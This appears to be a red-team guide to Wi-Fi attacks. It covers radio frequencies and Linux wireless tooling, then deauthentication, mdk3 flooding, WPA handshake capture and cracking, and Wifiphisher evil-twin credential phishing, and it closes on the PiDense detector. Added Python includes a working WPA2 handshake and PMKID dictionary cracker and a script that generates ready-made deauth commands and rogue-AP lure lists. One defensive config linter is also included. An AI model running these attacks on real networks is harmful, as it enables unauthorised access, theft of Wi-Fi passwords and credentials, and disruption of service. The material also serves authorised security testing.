A Red Teamer’s Guide to Wi-Fi Exploits
Wireless Technology and Frequency Spectrum Overview
Understanding the frequency spectrum and its various applications is crucial for professionals working with wireless technologies. This document outlines the frequency ranges and associated technologies, providing insights into their usage and characteristics.
Frequency Bands and Technologies
RFID (Radio Frequency Identification)
LF (Low Frequency): 120-150 kHz
HF (High Frequency): 13.56 MHz (also NFC)
UHF (Ultra-High Frequency): 433 MHz for active (battery-powered) tags; passive UHF tags such as EPC Gen2 use 860-960 MHz
Keyless Entry Systems
North America: 315 MHz
Europe and Asia: 433.92 MHz
Cellular Frequencies (US)
698-894 MHz: 700 MHz LTE (Bands 12, 13, 17) and 850 MHz cellular (Band 5)
1710-1755 MHz: AWS (Advanced Wireless Services)
1850-1910 MHz: PCS (Personal Communications Service)
2110-2155 MHz: AWS
Global Positioning System (GPS)
L1: 1575.42 MHz
L2: 1227.60 MHz
L Band
Frequency Range: 1-2 GHz
802.15.4 (ZigBee)
Europe: 868 MHz
US and Australia: 915 MHz
Worldwide: 2.4 GHz (channels 11-26, the band most ZigBee deployments use)
802.15.1 (Bluetooth)
Frequency Range: 2.4-2.4835 GHz
Wi-Fi Standards
802.11 b/g: 2.4 GHz
802.11a: 5.0 GHz
802.11n: 2.4/5.0 GHz
Satellite and Microwave Communication
C Band: 4-8 GHz
Ku Band: 12-18 GHz
K Band: 18-26.5 GHz
Ka Band: 26.5-40 GHz
Tools and Commands
To work effectively with these frequencies and technologies, engineers and technicians rely on a few references and commands:
FCC ID Lookup
The FCC ID printed on a device identifies its equipment authorization; looking it up returns the filed test reports, internal photos, and operating frequencies, which is the quickest way to learn what radios a target device contains:
FCC ID Lookup URL: FCC ID Lookup
Frequency Databases
A comprehensive frequency database is essential for planning and troubleshooting:
Frequency Database URL: Radio Reference Database
Practical Commands
Linux Networking Commands
View Wireless Interfaces:
iwconfig
Monitor Mode Activation:
airmon-ng start wlan0
Packet Capture:
airodump-ng wlan0mon
Bluetooth Scanning
Scan for Bluetooth Devices:
hcitool scan
hcitool is deprecated in BlueZ 5 (bluetoothctl, with scan on inside it, is the maintained replacement) and hcitool scan only finds Classic BR/EDR devices that are discoverable; BLE advertisers need hcitool lescan or bluetoothctl.
ZigBee Network Analysis
Scan for ZigBee Channels (needs a KillerBee-supported radio such as an RZUSBstick on the given device path):
sudo zbstumbler -i /dev/ttyUSB0
Wireless Hacking with Kismet and Linux Wi-Fi Commands
Kismet is a wireless network detector, sniffer, and intrusion detection system. It supports multiple wireless cards and decodes several protocols. The key table below belongs to the legacy ncurses client (Kismet releases before the 2018 rewrite); current Kismet is driven from a web UI on http://localhost:2501 and has no equivalent single-key commands. The Linux Wi-Fi commands that follow apply regardless of version.
Kismet Commands
Keys of the legacy Kismet ncurses client and what they do:
e: Show Kismet servers
h: Display help
z: Full-screen (zoom) the network display
n: Show current network number
m: Mute sound
i: Network details
t: Tag or untag a network
s: Sort the network list
g: Group tagged networks
l: Show wireless card power levels
u: Ungroup the current group
d: Display settings
c: Show clients of the current network
r: Packet rate graph
L: Lock the channel to the selected network's channel
a: Display network statistics
H: Return to normal channel hopping
p: Packet type capture
+/-: Expand/collapse network groups
f: Center the network
CTRL+L: Redraw the screen
w: Track alerts
Q: Quit Kismet
X: Close popup window
Essential Linux Wi-Fi Commands
Managing Wi-Fi networks in Linux involves using various command-line tools for configuration, monitoring, and troubleshooting. Below is a table of essential Linux Wi-Fi commands:
iwconfig: Show or configure wireless network interfaces (legacy wireless-tools; iw is the modern equivalent)
rfkill list: Display the soft/hard block status of RF devices
rfkill unblock all: Clear soft blocks on all RF devices (e.g., Wi-Fi, Bluetooth)
airodump-ng mon0: Capture frames on the monitor-mode interface mon0 (airmon-ng creates it; newer releases name it wlan0mon)
Practical Examples
Using Kismet
Starting Kismet
sudo kismet
Viewing Network Details: press i to see the details of a selected network.
Sorting the Network List: press s to sort the list of detected networks.
Displaying Current Users: press c to display the clients connected to the current network.
Using Linux Wi-Fi Commands
Configuring Wireless Interfaces (open or WEP networks only: key s: sets an ASCII WEP key and has no effect on WPA/WPA2, which needs wpa_supplicant as shown in the connection guide below)
sudo iwconfig wlan0 essid "YourNetworkSSID" key s:password
Checking RF Device Status
sudo rfkill list
Unblocking All RF Devices
sudo rfkill unblock all
Monitoring Wireless Interfaces
sudo airodump-ng mon0
Connecting to Wireless Networks in Linux
Below is a detailed guide on connecting to various types of wireless networks in Linux using command-line tools. It covers unsecured networks, WEP, WPA-PSK, and WPA-Enterprise networks. The ath0 interface name comes from the madwifi Atheros driver these commands were written for; on current kernels the interface is usually wlan0, so substitute it throughout.
Connecting to an Unsecured Network
To connect to an unsecured (open) network, use the following commands:
iwconfig ath0 essid $SSID
Set the SSID of the wireless network
ifconfig ath0 up
Bring the wireless interface up
dhclient ath0
Obtain an IP address via DHCP
Example:
iwconfig ath0 essid "OpenNetwork"
ifconfig ath0 up
dhclient ath0
Connecting to a WEP Network
To connect to a WEP-secured network, use the following commands (the s: prefix marks an ASCII key; omit it for a hex key such as 0123456789):
iwconfig ath0 essid $SSID key s:$KEY
Set the SSID and WEP key
ifconfig ath0 up
Bring the wireless interface up
dhclient ath0
Obtain an IP address via DHCP
Example:
iwconfig ath0 essid "WEPNetwork" key s:your_wep_key
ifconfig ath0 up
dhclient ath0
Connecting to a WPA-PSK Network
To connect to a WPA-PSK (Pre-Shared Key) network, use the following commands:
iwconfig ath0 essid $SSID
Set the SSID of the wireless network
ifconfig ath0 up
Bring the wireless interface up
wpa_supplicant -B -i ath0 -c wpa-psk.conf
Start the WPA supplicant daemon with the config
dhclient ath0
Obtain an IP address via DHCP
Example:
Create a WPA-PSK configuration file (wpa-psk.conf):
network={
ssid="WPA_PSK_Network"
psk="your_wpa_psk_password"
}
Run the commands:
iwconfig ath0 essid "WPA_PSK_Network"
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-psk.conf
dhclient ath0
Connecting to a WPA-Enterprise Network
To connect to a WPA-Enterprise network, use the following commands:
iwconfig ath0 essid $SSID
Set the SSID of the wireless network
ifconfig ath0 up
Bring the wireless interface up
wpa_supplicant -B -i ath0 -c wpa-ent.conf
Start the WPA supplicant daemon with the config
dhclient ath0
Obtain an IP address via DHCP
Example: Create a WPA-Enterprise configuration file (wpa-ent.conf):
network={
ssid="WPA_Enterprise_Network"
key_mgmt=WPA-EAP
eap=PEAP
identity="your_username"
password="your_password"
phase2="auth=MSCHAPV2"
}
As written, this block does not validate the RADIUS server's certificate, so the supplicant will complete PEAP with any access point that answers to the SSID and hand its MSCHAPv2 challenge/response to a rogue RADIUS server, where asleap (used later in this guide) can crack it offline. For a real client add ca_cert= pointing at the organisation's CA and domain_suffix_match= (or subject_match=) naming the RADIUS server; anonymous_identity= keeps the real username out of the cleartext outer identity.
Run the commands:
iwconfig ath0 essid "WPA_Enterprise_Network"
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-ent.conf
dhclient ath0
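As an added check (example code written for this page, not part of wpa_supplicant or the original guide), the following linter parses wpa_supplicant network blocks and flags EAP networks that lack server validation. It carries the page's PEAP block beside a hardened version; the CA path and RADIUS server name in the hardened block are assumptions to be replaced with your own.

```python
"""Lint wpa_supplicant network={...} blocks for the evil-twin weakness in the
WPA-Enterprise example: an EAP network that does not pin the RADIUS server will
authenticate to any rogue AP answering to its SSID. Added example code."""
import re

TUNNELED_EAP = {"PEAP", "TTLS", "FAST"}
NAME_CHECKS = ("domain_suffix_match", "domain_match", "subject_match", "altsubject_match")

# The page's own PEAP block, unchanged.
WEAK_CONF = """network={
    ssid="WPA_Enterprise_Network"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="your_username"
    password="your_password"
    phase2="auth=MSCHAPV2"
}
"""

# Hardened version: CA pinned, server name checked, outer identity anonymised.
# The CA path and server name are assumptions for illustration.
HARDENED_CONF = """network={
    ssid="WPA_Enterprise_Network"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="your_username"
    anonymous_identity="anonymous"
    password="your_password"
    # assumed path to the organisation's RADIUS CA certificate
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    # assumed RADIUS server name; rejects certs for any other host
    domain_suffix_match="radius.example.com"
    phase2="auth=MSCHAPV2"
}
"""

def parse_networks(conf):
    """Return one dict (option -> value, quotes stripped) per network={...} block."""
    blocks = []
    for body in re.findall(r"network\s*=\s*\{(.*?)\}", conf, re.S):
        entry = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip().strip('"')
        blocks.append(entry)
    return blocks

def lint_network(net):
    """Findings for one network block; PSK/open networks produce none."""
    findings = []
    ssid = net.get("ssid", "<no ssid>")
    if "WPA-EAP" not in net.get("key_mgmt", "") and "eap" not in net:
        return findings
    eap = net.get("eap", "").upper()
    if "ca_cert" not in net:
        findings.append(f"{ssid}: no ca_cert, so any RADIUS server certificate is accepted (evil-twin risk)")
    elif not any(k in net for k in NAME_CHECKS):
        findings.append(f"{ssid}: ca_cert set but server name unchecked; add domain_suffix_match")
    if eap in TUNNELED_EAP and "MSCHAPV2" in net.get("phase2", "").upper() and "ca_cert" not in net:
        findings.append(f"{ssid}: MSCHAPv2 inside an unvalidated tunnel can be captured and cracked offline")
    if eap in TUNNELED_EAP and "anonymous_identity" not in net:
        findings.append(f"{ssid}: outer identity equals the real username; set anonymous_identity")
    return findings

def lint_config(conf):
    """All findings for every network block in a wpa_supplicant config string."""
    return [f for net in parse_networks(conf) for f in lint_network(net)]

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, lint_config(conf) or "OK")
```

Run it against /etc/wpa_supplicant/wpa_supplicant.conf on a client you are auditing; a clean result means the supplicant will refuse a rogue AP even if the attacker presents a certificate from a public CA.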
Wi-Fi Network Testing in Linux
Testing Wi-Fi networks in Linux involves a series of commands to place wireless interfaces into monitor mode, capture handshakes, run offline dictionary attacks against them, and conduct denial-of-service (DoS) attacks. This guide provides a structured approach to these tasks using common tools such as airmon-ng, airodump-ng, aireplay-ng, aircrack-ng, mdk3, and others.
Setting Up Monitor Mode
To begin testing, place your wireless interface into monitor mode so it captures every frame on the channel rather than only frames addressed to it. The ath0/wifi0 names below come from the old madwifi Atheros driver, where wifi0 is the physical radio and ath0 a virtual interface on it; with current mac80211 drivers the interface is wlan0 and airmon-ng creates wlan0mon (run airmon-ng check kill first so NetworkManager and wpa_supplicant stop fighting over the card).
airmon-ng stop ath0
Remove the existing managed-mode interface ath0 to prepare for monitor mode
airmon-ng start wifi0
Start monitor mode on the wifi0 radio
iwconfig ath0 channel $CH
Lock the monitor interface to channel $CH (iw dev ath0 set channel $CH on modern drivers)
Example:
airmon-ng stop ath0
airmon-ng start wifi0
iwconfig ath0 channel 6
Capturing Client Handshake
The WPA/WPA2 4-way handshake is the input for the offline dictionary attack. aircrack-ng needs at least message 2 (SNonce and MIC) plus message 1 or 3 (ANonce), so a client must (re)connect while you are listening; that is what the deauthentication step forces.
airodump-ng -c $CH --bssid $AP -w file ath0
Capture traffic on channel $CH from access point $AP and save it to file (file-01.cap, file-01.csv, ...)
aireplay-ng -0 10 -a $AP -c $CLIENT ath0
Send 10 deauthentication frames to client $CLIENT on behalf of $AP so the client reconnects and repeats the handshake. -c is the client MAC, not the channel; omit it to broadcast to all clients of $AP. Clients and APs that negotiate 802.11w Protected Management Frames ignore spoofed deauths.
Example:
airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture ath0
aireplay-ng -0 10 -a 00:11:22:33:44:55 -c 00:22:33:44:55:66 ath0
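Choosing the right -a/-c pair by hand from airodump-ng's screen is error-prone on a busy site. The following added example (written for this page, not part of aircrack-ng) parses the CSV that airodump-ng -w writes beside the .cap and lists associated WPA-PSK clients as deauth targets, plus unassociated clients and the SSIDs they probe for (the input a Known Beacons or KARMA rogue AP would use). The CSV below is constructed in airodump-ng's layout; MACs and SSIDs are made up.

```python
"""Parse airodump-ng's file-01.csv and pick (AP, client) pairs worth deauthenticating
for a handshake capture. Added example; the sample CSV is constructed."""
import csv

SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-05-01 10:00:00, 2024-05-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,      120,        0,   0.  0.  0.  0,  11, CorpNetwork,
66:77:88:99:AA:BB, 2024-05-01 10:00:00, 2024-05-01 10:05:00, 11,  54, WEP, WEP, , -55,       80,     1532,   0.  0.  0.  0,   9, LegacyNet,
CC:DD:EE:FF:00:11, 2024-05-01 10:00:00, 2024-05-01 10:05:00,  1,  54, OPN, , , -60,       90,        0,   0.  0.  0.  0,   5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:22:33:44:55:66, 2024-05-01 10:01:00, 2024-05-01 10:05:00, -50,       35, 00:11:22:33:44:55, CorpNetwork
22:33:44:55:66:77, 2024-05-01 10:02:00, 2024-05-01 10:05:00, -62,       12, CC:DD:EE:FF:00:11, Guest
AA:BB:CC:DD:EE:FF, 2024-05-01 10:02:00, 2024-05-01 10:04:00, -70,        3, (not associated), FreeWifi,HomeNet
"""

def parse_airodump_csv(text):
    """Split the file at its two headers and return ({bssid: ap}, [station])."""
    ap_lines, sta_lines, section = [], [], None
    for line in text.splitlines():
        if line.startswith("BSSID,"):
            section = ap_lines
        elif line.startswith("Station MAC,"):
            section = sta_lines
        elif section is not None and line.strip():
            section.append(line)
    aps = {}
    for row in csv.reader(ap_lines, skipinitialspace=True):
        if len(row) < 14:
            continue
        aps[row[0]] = {"bssid": row[0], "channel": int(row[3]), "privacy": row[5].strip(),
                       "cipher": row[6].strip(), "auth": row[7].strip(),
                       "power": int(row[8]), "essid": row[13]}
    stations = []
    for row in csv.reader(sta_lines, skipinitialspace=True):
        if len(row) < 6:
            continue
        # probed ESSIDs are comma-separated in the last columns, unquoted
        stations.append({"mac": row[0], "power": int(row[3]), "bssid": row[5].strip(),
                         "probes": [p for p in row[6:] if p]})
    return aps, stations

def handshake_targets(aps, stations, min_client_power=-75):
    """Associated clients of WPA/WPA2-PSK APs; WEP, open and enterprise (MGT) APs are skipped,
    as are clients too weak for an injected deauth to reach (threshold is an assumption)."""
    targets = []
    for sta in stations:
        ap = aps.get(sta["bssid"])
        if ap is None or "WPA" not in ap["privacy"] or ap["auth"] != "PSK":
            continue
        if sta["power"] < min_client_power:
            continue
        targets.append({"bssid": ap["bssid"], "channel": ap["channel"],
                        "essid": ap["essid"], "client": sta["mac"]})
    return targets

def aireplay_command(target, iface="wlan0mon", count=10):
    """The aireplay-ng line from the guide, filled in from one target."""
    return f"aireplay-ng -0 {count} -a {target['bssid']} -c {target['client']} {iface}"

def probing_clients(stations):
    """Unassociated stations and the SSIDs they probe for (Known Beacons / KARMA input)."""
    return {s["mac"]: s["probes"] for s in stations
            if s["bssid"] == "(not associated)" and s["probes"]}

if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for t in handshake_targets(aps, stations):
        print(f"ch {t['channel']} {t['essid']}: {aireplay_command(t)}")
    print(probing_clients(stations))
```

Run it on capture-01.csv from the airodump-ng command above; each printed line is a ready-made deauth command, and the probe list tells you which SSIDs a rogue AP on the same site would have to advertise.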
Brute Force Handshake Attack
Once the handshake is captured, an offline dictionary attack can be run to find the WPA-PSK: each candidate passphrase is turned into a PMK (PBKDF2-HMAC-SHA1 over the SSID, 4096 rounds), the PTK is derived from the PMK and the captured nonces, and the MIC computed with the PTK's KCK is compared with the MIC in the capture. The second and third commands do not target WPA-PSK at all: asleap cracks LEAP (and MSCHAPv2) challenge/response pairs and eapmd5pass cracks EAP-MD5, both captured from WPA-Enterprise networks whose EAP exchange was recorded.
aircrack-ng -w wordlist capture.cap
Dictionary attack on the WPA-PSK handshake in capture.cap using wordlist (add -b $AP if the capture holds several networks)
asleap -r capture.cap -w dict.asleap
Crack LEAP using the asleap dictionary (built from a wordlist with asleap's genkeys) against capture.cap
eapmd5pass -r capture.cap -w wordlist
Crack EAP-MD5 using wordlist against capture.cap
Example:
aircrack-ng -w wordlist.txt capture.cap
asleap -r capture.cap -w dict.asleap
eapmd5pass -r capture.cap -w wordlist.txt
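What aircrack-ng does per candidate, written out as an added example (this is not aircrack-ng's code): PBKDF2 to the PMK, the 802.11 PRF to the PTK, HMAC over the zeroed EAPOL frame to the MIC, and a dictionary loop that stops on a match. It goes beyond the commands above by also computing and cracking the PMKID, which is the same PMK checked through HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC) and is what the PMKID attacks listed later under WEF and Wifite recover. The handshake, MACs, nonces, passphrase and wordlist are all constructed here; only the "password"/"IEEE" PMK in the test is a published 802.11 test vector.

```python
"""Offline WPA2-PSK handshake and PMKID cracking, standard library only.
Added example, not aircrack-ng's implementation; all capture data is constructed."""
import hashlib
import hmac

def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def derive_ptk(pmk, aa, spa, anonce, snonce, length=48):
    """802.11 PRF: PTK = PRF(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces)).
    48 bytes for CCMP; the first 16 are the KCK that keys the EAPOL MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range((length + 19) // 20):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:length]

def eapol_mic(kck, eapol):
    """MIC over the EAPOL-Key frame with its MIC field (bytes 81..96) zeroed.
    Key descriptor version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1-128."""
    version = int.from_bytes(eapol[5:7], "big") & 0x7
    zeroed = eapol[:81] + b"\x00" * 16 + eapol[97:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError(f"descriptor version {version} (AES-128-CMAC) not handled here")

def pmkid(pmk, aa, spa):
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA), sent by the AP in message 1."""
    return hmac.new(pmk, b"PMK Name" + aa + spa, hashlib.sha1).digest()[:16]

def crack_handshake(ssid, aa, spa, anonce, eapol_msg2, wordlist):
    """Return the passphrase whose KCK reproduces the MIC in message 2, else None."""
    snonce, captured_mic = eapol_msg2[17:49], eapol_msg2[81:97]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured_mic):
            return candidate
    return None

def crack_pmkid(ssid, aa, spa, captured_pmkid, wordlist):
    """Same dictionary loop against a PMKID; no client or nonces needed."""
    for candidate in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(candidate, ssid), aa, spa), captured_pmkid):
            return candidate
    return None

# ---- constructed sample capture -------------------------------------------------
def build_eapol_msg2(snonce, mic=b"\x00" * 16):
    """Minimal WPA2 message 2: EAPOL header, RSN descriptor, key info 0x010a
    (version 2, pairwise, MIC), replay counter 1, SNonce, zero IV/RSC/ID, MIC, no key data."""
    body = (b"\x02" + (0x010a).to_bytes(2, "big") + (0).to_bytes(2, "big") + (1).to_bytes(8, "big")
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + (0).to_bytes(2, "big"))
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body

SSID = "CorpNetwork"                     # constructed
AA = bytes.fromhex("001122334455")       # AP MAC from the airodump example
SPA = bytes.fromhex("002233445566")      # client MAC from the aireplay example
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
TRUE_PASSPHRASE = "Summer2024!"          # constructed; the attack must recover it
WORDLIST = ["password", "letmein", "Summer2024!", "correct horse"]

def make_sample_capture():
    """Produce (message 2 with valid MIC, PMKID) as an AP and client using TRUE_PASSPHRASE would."""
    pmk = pmk_from_passphrase(TRUE_PASSPHRASE, SSID)
    kck = derive_ptk(pmk, AA, SPA, ANONCE, SNONCE)[:16]
    msg2 = build_eapol_msg2(SNONCE, eapol_mic(kck, build_eapol_msg2(SNONCE)))
    return msg2, pmkid(pmk, AA, SPA)

if __name__ == "__main__":
    msg2, pid = make_sample_capture()
    print("handshake:", crack_handshake(SSID, AA, SPA, ANONCE, msg2, WORDLIST))
    print("pmkid:", crack_pmkid(SSID, AA, SPA, pid, WORDLIST))
```

The cost is dominated by the 4096-round PBKDF2 per candidate, which is why aircrack-ng and hashcat parallelise exactly that step and why a weak passphrase, not the protocol, is what falls to this attack.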
Denial of Service (DoS) Attack
mdk3 floods the air with forged management frames; "int" in the synopsis stands for the monitor-mode interface. mdk4 is the maintained successor and keeps the same mode letters.
mdk3 int a -a $AP
Authentication flood against $AP (fills its client table with fake stations until it stalls or resets)
mdk3 int b -c $CH
Beacon flood on channel $CH (advertises a stream of fake SSIDs; the kind of activity the PiDense detector later in this guide flags)
Example:
mdk3 wlan0 a -a 00:11:22:33:44:55
mdk3 wlan0 b -c 6
Wifiphisher Overview and Usage Guide
Wifiphisher is a powerful, flexible, modular, easy-to-use tool for conducting man-in-the-middle (MiTM) attacks to obtain credentials from unsuspecting Wi-Fi users. This tool runs on Linux and is especially effective when deployed on a Raspberry Pi. It supports various Wi-Fi association techniques, such as Evil Twin, KARMA, and Known Beacons, and comes with community-driven phishing templates for different scenarios.
Key Features
Powerful: Capable of running for extended periods on devices like Raspberry Pi, employing various Wi-Fi association techniques.
Flexible: Supports numerous arguments and community-driven phishing templates.
Modular: Users can write Python modules to expand functionality or create custom phishing scenarios.
Easy to Use: Beginners can start with simple commands, while advanced users can utilize the full feature set.
Research-Backed: Incorporates state-of-the-art phishing techniques disclosed by developers.
Community-Supported: Developed and maintained by an active community.
Free: Available for free download with full source code under the GPLv3 license.
How It Works
Wi-Fi phishing with Wifiphisher involves two main steps:
Establishing a MiTM Position: Wifiphisher uses Evil Twin, KARMA, and Known Beacons to get Wi-Fi clients to associate with its rogue access point without the user noticing.
Performing Phishing Attacks: Once the MiTM position is established, various phishing attacks can be conducted, such as data sniffing or web-based credential capture.
Installation
To install the latest development version, use the following commands:
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install
Example Commands
Manual Interface Selection and Firmware Upgrade Scenario:
wifiphisher -aI wlan0 -jI wlan4 -p firmware-upgrade --handshake-capture handshake.pcap
-aI wlan0: Use wlan0 for spawning the rogue Access Point.
-jI wlan4: Use wlan4 for the deauthentication (jamming) attack; in current releases this flag is -eI/--extensionsinterface, as in the option table below.
-p firmware-upgrade: Perform the "Firmware Upgrade" scenario.
--handshake-capture handshake.pcap: Verify the Pre-Shared Key the victim types against the handshake in handshake.pcap, so only the real passphrase is accepted.
Automatic Interface Selection and Plugin Update Scenario:
wifiphisher --essid CONFERENCE_WIFI -p plugin_update -pK s3cr3tp4ssw0rd
--essid CONFERENCE_WIFI: Target the Wi-Fi network with ESSID "CONFERENCE_WIFI".
-p plugin_update: Perform the "Plugin Update" scenario.
-pK s3cr3tp4ssw0rd: Protect the Evil Twin with PSK "s3cr3tp4ssw0rd".
Open Wi-Fi Network and OAuth Login Scenario:
wifiphisher --essid "FREE WI-FI" -p oauth-login -kB
--essid "FREE WI-FI": Spawn an open Wi-Fi network with ESSID "FREE WI-FI".
-p oauth-login: Perform the "OAuth Login" scenario.
-kB: Use the Known Beacons technique (broadcast beacons for many common SSIDs so devices that remember any of them auto-connect).
Command-Line Options
Below is a table of useful command-line options for Wifiphisher (short form, long form, purpose):
-h, --help: Show help message and exit
-i, --interface: Choose an interface that supports both AP and monitor modes
-eI, --extensionsinterface: Choose an interface that supports monitor mode for running extensions
-aI, --apinterface: Choose an interface that supports AP mode for spawning an AP
-pI, --protectinterface: Specify interfaces protected from NetworkManager
-kN, --keepnetworkmanager: Do not kill NetworkManager
-nE, --noextensions: Do not load any extensions
-e, --essid: Enter the ESSID of the rogue Access Point
-pPD, --phishing-pages-directory: Search for phishing pages in the specified directory
-p, --phishingscenario: Choose the phishing scenario to run
-pK, --presharedkey: Add WPA/WPA2 protection on the rogue Access Point
-qS, --quitonsuccess: Stop the script after successfully retrieving one pair of credentials
-lC, --lure10-capture: Capture BSSIDs during the AP selection phase as part of the Lure10 attack
-lE, --lure10-exploit: Exploit the captured BSSIDs to fool the Windows Location Service
-iAM, --mac-ap-interface: Specify the MAC address of the AP interface
-iEM, --mac-extensions-interface: Specify the MAC address of the extensions interface
-iNM, --no-mac-randomization: Do not change any MAC address
-hC, --handshake-capture: Capture WPA/WPA2 handshakes for verifying the passphrase
-dE, --deauth-essid: Deauth all BSSIDs in the WLAN with the specified ESSID
-dC, --deauth-channels: Channels to deauth
--logging: Enable logging; output is saved to the wifiphisher.log file
-lP, --logpath: Determine the full path of the logfile
-cP, --credential-log-path: Determine the full path of the file that will store any captured credentials
-cM, --channel-monitor: Monitor whether the target access point changes channel
--payload-path: Enable the payload path; intended for use with scenarios that serve payloads
-wP, --wps-pbc: Monitor whether the button on a WPS-PBC Registrar side is pressed
-wAI, --wpspbc-assoc-interface: The WLAN interface used for associating to the WPS Access Point
-kB, --known-beacons: Perform the Known Beacons Wi-Fi automatic association technique
-fH, --force-hostapd: Force the usage of the hostapd installed in the system
--dnsmasq-conf DNSMASQ_CONF: Determine the full path of the dnsmasq.conf file
-dK, --disable-karma: Disable the KARMA attack
-pE, --phishing-essid: Determine the ESSID you want to use for the phishing page
WEF (WiFi Exploitation Framework) Overview and Usage Guide
WEF is a comprehensive tool designed for executing a variety of Wi-Fi attacks. It supports numerous attack types, automatic handshake capture and cracking, and provides multiple templates for EvilTwin attacks in different languages. This guide provides an overview of its features, installation process, common usage commands, and available attacks.
Key Features
WPA/WPA2, WPS, and WEP Attacks: Supports a wide range of attacks on different Wi-Fi security protocols.
Automatic Handshake Capture and Cracking: Facilitates easy capture and cracking of WPA/WPA2 handshakes.
Multiple Templates for EvilTwin Attack: Offers various templates in different languages for conducting EvilTwin attacks.
Monitor Mode Management: Allows enabling/disabling monitor mode and viewing interface info (frequencies, chipset, MAC address).
2.4 GHz and 5 GHz Support: Capable of attacking networks on both frequency bands.
Informative Attack Logs: Provides detailed logs of the conducted attacks.
Custom Wordlist Selector: Enables selection of custom wordlists when cracking.
Language Support: Available in English and Spanish.
Installation
git clone https://github.com/D3Ext/WEF
cd WEF
bash wef
Available Attacks
Deauthentication Attack
Disconnects clients from a network.
WIDS Confusion Attack
Confuses Wireless Intrusion Detection Systems.
Authentication Attack
Floods AP with authentication requests.
Beacon Flood Attack
Floods the airwaves with fake beacon frames.
TKIP Attack (Michael Shutdown Exploitation)
Exploits vulnerabilities in TKIP.
Pixie Dust Attack
Offline attack against WPS networks.
Null Pin Attack
Tests all-zero WPS pins.
PIN Bruteforce Attack
Attempts to brute-force WPS pins.
ARP Replay Attack
Generates traffic to capture IVs for WEP cracking.
HIRTE Attack
Attacks WEP-protected networks via clients.
Caffe Latte Attack
Cracks WEP keys by targeting clients.
Fake Authentication Attack
Fakes authentication to the target AP.
WPA/WPA2 Handshake Capture Attack
Captures WPA/WPA2 handshakes for cracking.
PMKID Attack
Exploits a vulnerability in WPA/WPA2 for handshakes.
EvilTwin Attack
Creates a rogue AP to capture credentials.
Command-Line Options
-i, --interface: Specify your network adapter interface in managed mode
-h, --help: Show the help panel
--version: Print the version and exit
GeoWiFi: WiFi Geolocation Data Search Tool
GeoWiFi is a powerful tool designed to search WiFi geolocation data by BSSID and SSID using various public databases. This guide covers its key features, installation, usage, and command options.
Key Features
Database Support: GeoWiFi queries multiple databases including Wigle, Apple, Google, Mylnikov, WifiDB, and Combain.
Output Flexibility: Supports output in map or JSON format.
Custom Configuration: Allows API configuration through a YAML file.
Docker Support: Can be run using Docker for ease of deployment.
Installation
Prerequisites
Python 3
Windows Terminal (recommended for Windows users to display emojis)
Configuration
GeoWiFi uses a configuration file located at gw_utils/config.yaml to store API keys and other settings.
Example Configuration (config.yaml):
wigle_auth: "your_wigle_encoded_key"
google_api: "your_google_api_key"
combain_api: "your_combain_api_key"
no-ssl-verify: false
Usage
Command-Line Interface
usage: geowifi.py [-h] [-s {bssid,ssid}] [-o {map,json}] identifier
Search for information about a network with a specific BSSID or SSID.
positional arguments:
identifier The BSSID or SSID of the network to search for.
options:
-h, --help Show this help message and exit
-s {bssid,ssid}, --search-by {bssid,ssid}
Specifies whether to search by BSSID or SSID (default: bssid)
-o {map,json}, --output-format {map,json}
Specifies the output format for the search results (default: map)
Examples
Search by BSSID:
python3 geowifi.py -s bssid 00:11:22:33:44:55
Search by SSID:
python3 geowifi.py -s ssid "NetworkName"
Output in JSON Format:
python3 geowifi.py -s bssid 00:11:22:33:44:55 -o json
Output in Map Format:
python3 geowifi.py -s ssid "NetworkName" -o map
PiDense: Monitoring Illegal Wireless Network Activities
Purpose
PiDense is designed to monitor and detect illegal wireless network activities. It focuses on identifying suspicious SSID broadcasts, detecting deauthentication attacks, and monitoring wireless network anomalies such as KARMA attacks and WiFi Pineapple activities.
Capabilities
Detects similar SSID broadcasts
Detects SSID brute force attacks
Detects beacon floods
Monitors deauthentication attacks
Identifies unencrypted wireless network density
Monitors SSID broadcasts against a blacklist
Detects KARMA attacks
Monitors WiFi Pineapple activities
Soon to be Added Features
Pcap parsing
Company name setting for monitoring illegal wireless activities
Probe request analysis for SSID brute force detection
Beacon analysis for SSID flood detection
Working Principle
